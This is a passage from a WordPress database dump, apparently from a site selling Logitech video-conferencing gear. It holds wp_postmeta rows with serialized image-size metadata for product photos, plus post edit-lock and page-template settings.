:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"conferencecam-connect-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"conferencecam-connect-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(501,1319,'_wp_attached_file','2018/12/conferencecam-bcc950.png'),(502,1319,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:32:\"2018/12/conferencecam-bcc950.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:32:\"conferencecam-bcc950-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:30:\"conferencecam-bcc950-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(505,1321,'_wp_attached_file','2018/12/ptz-pro-2-camera.png'),(506,1321,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:28:\"2018/12/ptz-pro-2-camera.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:28:\"ptz-pro-2-camera-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:26:\"ptz-pro-2-camera-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(509,1323,'_edit_lock','1569212834:1'),(510,1323,'_edit_last','1'),(512,1324,'_edit_last','1'),(513,1324,'_edit_lock','1546416900:1'),(514,1325,'_edit_lock','1569213328:1'),(515,1325,'_edit_last','1'),(516,1327,'_wp_attached_file','2018/12/smartdock.png'),(517,1327,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:21:\"2018/12/smartdock.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"smartdock-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"smartdock-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:21:\"smartdock-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:21:\"smartdock-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(519,1328,'_edit_lock','1569227012:1'),(520,1328,'_edit_last','1'),(521,1329,'_edit_lock','1546416895:1'),(522,1329,'_edit_last','1'),(527,1332,'_wp_attached_file','2018/12/briopictograms.png'),(528,1332,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:26:\"2018/12/briopictograms.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"briopictograms-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"briopictograms-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"briopictograms-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"briopictograms-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:24:\"briopictograms-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(529,1333,'_edit_lock','1546417019:1'),(530,1334,'_wp_attached_file','2018/12/c930e-webcam.png'),(531,1334,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:24:\"2018/12/c930e-webcam.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"c930e-webcam-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"c930e-webcam-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(532,1333,'_edit_last','1'),(533,1336,'_wp_attached_file','2018/12/c925e-webcam.png'),(534,1336,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:24:\"2018/12/c925e-webcam.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:24:\"c925e-webcam-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:22:\"c925e-webcam-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(535,1335,'_edit_last','1'),(536,1335,'_edit_lock','1546417003:1'),(543,1341,'_edit_lock','1546418404:1'),(544,1341,'_edit_last','1'),(545,1342,'_edit_lock','1546418550:1'),(546,1342,'_edit_last','1'),(549,1344,'_edit_last','1'),(550,1344,'_edit_lock','1546418554:1'),(551,1345,'_edit_lock','1546418546:1'),(552,1345,'_edit_last','1'),(553,1348,'_edit_last','1'),(554,1348,'_edit_lock','1569222165:1'),(555,1349,'_edit_lock','1569226870:1'),(556,1349,'_edit_last','1'),(562,1352,'_edit_lock','1569298457:1'),(563,1352,'_edit_last','1'),(564,1354,'_wp_attached_file','2018/12/b525-pdp-2017-refresh.png'),(565,1354,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:33:\"2018/12/b525-pdp-2017-refresh.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"b525-pdp-2017-refresh-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"b525-pdp-2017-refresh-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(566,1353,'_edit_lock','1546418550:1'),(567,1352,'_wp_page_template','template-fullwidth.php'),(568,1352,'_hide_page_title',''),(569,1352,'_hide_header',''),(570,1352,'_hide_footer',''),(571,1352,'_hide_breadcrumb',''),(572,1352,'_cover',''),(573,1352,'_show_excerpt',''),(574,1352,'_wc_apply_product',''),(575,1353,'_edit_last','1'),(576,1356,'_edit_lock','1569298459:1'),(577,1356,'_edit_last','1'),(578,1357,'_edit_lock','1546418553:1'),(579,1357,'_edit_last','1'),(580,1356,'_wp_page_template','template-fullwidth.php'),(581,1356,'_hide_page_title',''),(582,1356,'_hide_header',''),(583,1356,'_hide_footer',''),(584,1356,'_hide_breadcrumb',''),(585,1356,'_cover',''),(586,1356,'_show_excerpt',''),(587,1356,'_wc_apply_product',''),(588,1361,'_edit_lock','1546418502:1'),(589,1361,'_edit_last','1'),(590,1362,'_edit_lock','1545009654:1'),(591,1362,'_edit_last','1'),(592,1364,'_wp_attached_file','2018/12/h570e-headset.png'),(593,1364,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:25:\"2018/12/h570e-headset.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"h570e-headset-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"h570e-headset-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"h570e-headset-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"h570e-headset-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:23:\"h570e-headset-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(594,1362,'_wp_page_template','template-fullwidth.php'),(595,1362,'_hide_page_title',''),(596,1362,'_hide_header',''),(597,1362,'_hide_footer',''),(598,1362,'_hide_breadcrumb',''),(599,1362,'_cover',''),(600,1362,'_show_excerpt',''),(601,1362,'_wc_apply_product',''),(602,1363,'_edit_last','1'),(603,1363,'_edit_lock','1569226938:1'),(604,1366,'_edit_lock','1569227104:1'),(605,1366,'_edit_last','1'),(606,1370,'_edit_lock','1571992480:1'),(607,1370,'_edit_last','1'),(608,1371,'_edit_lock','1546419697:1'),(610,1371,'_edit_last','1'),(611,1374,'_edit_last','1'),(612,1374,'_edit_lock','1569227727:1'),(613,1375,'_edit_lock','1546419706:1'),(614,1375,'_edit_last','1'),(615,1376,'_edit_last','1'),(616,1376,'_edit_lock','1546419704:1'),(619,1378,'_edit_lock','1569228403:1'),(620,1378,'_edit_last','1'),(621,1379,'_edit_last','1'),(622,1379,'_edit_lock','1546419708:1'),(623,1380,'_edit_lock','1546419707:1'),(624,1380,'_edit_last','1'),(625,1382,'_edit_lock','1546419708:1'),(626,1382,'_edit_last','1'),(627,1383,'_edit_lock','1546419586:1'),(628,1383,'_edit_last','1'),(629,1384,'_edit_last','1'),(630,1384,'_edit_lock','1546419700:1'),(631,1385,'_edit_last','1'),(632,1385,'_edit_lock','1546918561:1'),(633,1386,'_wp_attached_file','2018/12/smartdock-extender-box.png'),(634,1386,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:34:\"2018/12/smartdock-extender-box.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:34:\"smartdock-extender-box-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:34:\"smartdock-extender-box-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:34:\"smartdock-extender-box-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:34:\"smartdock-extender-box-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:32:\"smartdock-extender-box-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(635,1387,'_edit_lock','1546419618:1'),(636,1387,'_edit_last','1'),(637,1388,'_edit_last','1'),(638,1388,'_edit_lock','1546419645:1'),(639,1389,'_edit_last','1'),(640,1389,'_edit_lock','1546419655:1'),(641,1390,'_edit_last','1'),(642,1390,'_edit_lock','1546419601:1'),(643,1391,'_wp_attached_file','2018/12/logitech-screen-share.png'),(644,1391,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:33:\"2018/12/logitech-screen-share.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"logitech-screen-share-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"logitech-screen-share-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:33:\"logitech-screen-share-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:33:\"logitech-screen-share-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:31:\"logitech-screen-share-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(645,1392,'_wp_attached_file','2018/12/group-expansion-microphones.png'),(646,1392,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:39:\"2018/12/group-expansion-microphones.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"group-expansion-microphones-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"group-expansion-microphones-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:39:\"group-expansion-microphones-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:39:\"group-expansion-microphones-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:37:\"group-expansion-microphones-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(647,1393,'_edit_lock','1546480183:1'),(648,1393,'_edit_last','1'),(649,1394,'_edit_last','1'),(650,1394,'_edit_lock','1546421594:1'),(651,1395,'_edit_last','1'),(652,1395,'_edit_lock','1569228104:1'),(653,1396,'_edit_last','1'),(654,1396,'_edit_lock','1546421596:1'),(655,1397,'_wp_attached_file','2018/12/logitech-smartdock-flex.png'),(656,1397,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:35:\"2018/12/logitech-smartdock-flex.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"logitech-smartdock-flex-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"logitech-smartdock-flex-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:35:\"logitech-smartdock-flex-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:35:\"logitech-smartdock-flex-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:33:\"logitech-smartdock-flex-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(657,1398,'_edit_last','1'),(658,1398,'_edit_lock','1569227585:1'),(659,1399,'_edit_lock','1569228003:1'),(660,1399,'_edit_last','1'),(663,1400,'_edit_last','1'),(664,1400,'_edit_lock','1546421598:1'),(665,1401,'_wp_attached_file','2018/12/group-15m-extended-cable.png'),(666,1401,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:36:\"2018/12/group-15m-extended-cable.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"group-15m-extended-cable-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"group-15m-extended-cable-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:36:\"group-15m-extended-cable-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:36:\"group-15m-extended-cable-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:34:\"group-15m-extended-cable-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(667,1402,'_edit_lock','1546421598:1'),(668,1402,'_edit_last','1'),(669,1404,'_wp_attached_file','2018/12/group-10m-extended-cable.png'),(670,1404,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:393;s:6:\"height\";i:393;s:4:\"file\";s:36:\"2018/12/group-10m-extended-cable.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"group-10m-extended-cable-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"group-10m-extended-cable-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:36:\"group-10m-extended-cable-300x150.png\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:36:\"group-10m-extended-cable-393x300.png\";s:5:\"width\";i:393;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:34:\"group-10m-extended-cable-20x20.png\";s:5:\"width\";i:20;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";